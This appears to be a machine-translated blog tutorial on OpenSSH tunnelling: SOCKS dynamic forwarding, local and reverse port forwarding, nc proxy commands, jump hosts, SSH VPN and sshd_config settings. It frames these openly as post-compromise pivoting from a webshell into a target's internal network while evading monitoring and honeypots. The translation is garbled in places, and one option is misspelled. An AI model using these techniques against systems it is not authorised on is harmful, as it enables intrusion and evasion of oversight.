OpenSSH Advanced Techniques

Four weeks in arrears. Just update one first. The transplant of Kali Nethunter in the past three weeks is what Yu Xian called the “hacking phone” [Slant Eye], and stepped on too many pitfalls. Writing an article can definitely make up for the missing weeks…

Back to business. To be honest, there are no more online tutorials about the advanced usage of ssh, but unfortunately,** They are science students ** I really can’t understand the thinking. For example, for the difference between local forwarding and remote forwarding, I have to Google a tutorial every time I use forwarding, and I have to read it for a long time every time. It’s really annoying. This article wants to shift the focus away from the various commands and parameters of ssh, focus on the specific network environment, and discuss how to use the powerful ssh easily and freely in different bad network environments The tool connects to any host.

In all the following examples, machine A represents our little hacker (A for ahahaha), machine B is our target (B for bazi), we want to get things on machine B (or in the network where B is located) from A, including Connect to a shell on B, or forward a port on B. If there is a need for network transit, I will use machine P to represent (P for proxy).

Port forwarding is a very powerful function of ssh, and it is also necessary when we do bad things. For example, Bazi has a MySQL database bound to port can only be accessed locally in Bazi. We want to scan it with a tool. Should we transfer our black wide gadget to Bazi to run? Or forward this port to our machine A and attack it with our gadget? The usefulness of forwarding is self-evident.

Two-way connectable network penetration

Two-way connectable means that both parties A and B can initiate tcp connections to each other (the concept of forward connection and reverse connection is not discussed here). The following situations can initiate an ssh connection from either side.

  • A and B can ping each other (both have public IP or are in the same LAN, and the middle** no firewall ** )
  • Although A and B may not be pinged behind the router, the router kindly forwarded the port of the machine. (NAT in the middle, but there are** two or more ** port accessible)

Both of these situations have restrictions, ~~ (so there are very few ideal network environments, so this tutorial is needed hahaha) ~~ Scenario 2 requires two ports forwarded by routers because, in addition to the fact that we need port forwarding to use port, sshd also needs a separate port for listening to ssh connections. Of course, if you don’t want to forward and just want to connect to a shell, then one port is enough. If there is no port, there is even a wool!

These two network situations are the best for us, because we can connect two machines at will using any method in this article. Let’s talk about the simplest connection method first, the connection shell is always ssh hostB no more.** Let's just talk about port forwarding **.

Forward the entire network segment

For us, the way with the most authority, and the way that can be used in the most ideal situation, is to open a network proxy on B (called in ssh_ Dynamic forwarding dynamic port forwarding _ ), in this way, A can access all the machines in the B network from the perspective of B in the network,** That is, to realize the role of network penetration ** , Instead of point-to-point forwarding of one machine and one port, greatly improve the attack efficiency.

The following command will open a socks proxy on port 1080 of Bazi (socks4 and socks5 are supported at the same time). If there is NAT in the middle, this port 1080 is the second port that the router needs to forward, because we want to connect to it.

ssh -D 1080 hostB

If we want to use some shy little tool, just set hostB:1080 as the proxy server in the little tool~

forward a port

Connect on hostA (local forwarding, forwarding to local), you can bind hostA:6666 to localhost:3306 on hostB

ssh -L 6666:localhost:3306 hostB

exist** HostB ** Connecting on (remote forwarding, forwarding to the remote end), the same effect. This works fine if we get the webshell but don’t have B’s ssh password. It will also be mentioned below that if A wants something from B but wants B to connect to A, this is called reverse connection.

ssh -R 6666:localhost:3306 hostA

The above two commands only need the ssh port to be accessible, no second port is required.

Networks that allow only one-way connections

The scenario of a one-way connection is:

  • A or B is behind the router (via NAT), and there is no port forwarding done by well-meaning people
  • Firewall (such as iptables rules or cloud service provider’s security policy) prohibits incoming connections

In this case, it is absolutely impossible to use dynamic forwarding. Now under normal circumstances, our B is well protected by the firewall. In this case, we’ll assume we’ve got a webshell or a trick to run commands. Well, of course we can only do other things after we have permission…

Even hostB’s localhost we have tried, we want to do something else. Now we find in the command line history of hostB that it has connected to hostSB.local in the intranet, run the remote command echo, and it can be connected. Now we want to forward hostSB, after all, webshell is not interactive. We can.

ssh -R 6666:hostsb.local:22 hostA

In this way, connecting hostA:6666 is equivalent to hostSB:22. Similarly, if we can only connect to B from A, refer to the above method to use ssh -L Just forward it locally.

I am a little hacker! no one can touch me

People’s hearts are not ancient and the world is cold. What if I am exposed and the network center checks my water meter? So when we

  • Connecting to the internet through a proxy or VPN, unable to accept incoming connections
  • Both hostA and hostB are behind NAT, and the two machines face each other

This is the case in our school. Although everyone can connect to Wi-Fi, the connection between clients is actively dropped by the firewall, and only the broadcast can barely be received. However, you can connect through other machines in the school as a springboard, and you need to use a proxy at this time.

through a proxy server

The method of connecting through a proxy is not a function of ssh in essence, and another program netcat is needed to forward traffic. The following command makes our connection proxy hostP to hostB through socks5

ssh -o ProxyComand='nc -x hostP:1080 %h %p' hostB

The proxy connection mode of nc supports http connect (add parameter nc -X connect), socks4 ( nc -X4) or socks5 (do not add parameters as above or add nc -X5)

via springboard machine with ssh

This situation is equivalent to the fact that hostP can connect from hostA to hostB at the same time. In this case, you only need to connect hostP with hostB, forward your ssh port to a remote such as hostP:6666, and then use hostA to connect to it, -R Forward to hostA:2333, or directly let hostA connect to hostP:6666.

Advanced Usage & Notes

background forwarding, secretly

ssh -f The ssh process can be forked to the background, so that it does not prevent us from continuing to print the shell. ssh -N Do not open the shell, only forward

SSH-based VPN

See man ssh in the “SSH-BASED VIRTUAL PRIVATE NETWORKS” section. ~~(I didn’t see it)~~Requires root privileges. Routing and forwarding can be done. There is no need to open a proxy, only one port is needed, and it can pass NAT. Works great with explosions.

Forwarded domain name resolution problem

In the above, we used ssh -R and ssh -L forwarded localhost and hostsb.local respectively. There is actually a small problem here. hostB running ssh -R 6666:hostsb.local:22 hostA When forwarding to the remote, it is on hostB, that is, on_ localhost running ssh commands _ Convert hostsb.local to hostSB’s IP! If it is reversed as above, run on hostA ssh -L 6666:hostsb.local:22 hostB, there is no doubt that hostA is not in the network of hostB, it does not know what hostsb.local is, therefore, use ssh -L When forwarding to the local, it is in_ Remote hosts that accept ssh connections _ Analyze the forwarded domain name on the Internet! In some environments, this can make a huge difference. If IDS and honeypots are deployed in the hostB environment, and we want to use it as a springboard to attack other networks, the domain name they resolve may pull us into a trap, and then hehehehe.

Configuration issues for enabling forwarding

On the side of the port forwarded in the ssh connection, in the system’s /etc/ssh/sshd_config Port forwarding must be allowed in. Otherwise an error will be reported Administrative prohibited. default is any, all allowed.

PermitOpen any
PermitOpen host:port
PermitOpen IPv4_addr:port
PermitOpen [IPv6_addr]:port
PermitOpen none

at the end of the bound port sshd_config In, you can set whether to allow modification of the interface monitored by the bound port, set to no, it can only be bound to localhost, set to yes When, it is forced to bind to the specified port of all network cards (bound to wildcard address), set to clientspecified when using ssh -L [bind_address:]port:host:hostport or -R, the optional bind_address parameter specifies which IP to bind to. For example, please refer to the manpage of ssh for details. In short, if port forwarding is required, similar to the last case above, it is best not to set it to no.

GatewayPorts no

And other~~ (especially the Chinese article!)~~ I like to say in the article PermitTunnel The parameters are actually prepared to allow the ssh-based vpn mentioned above.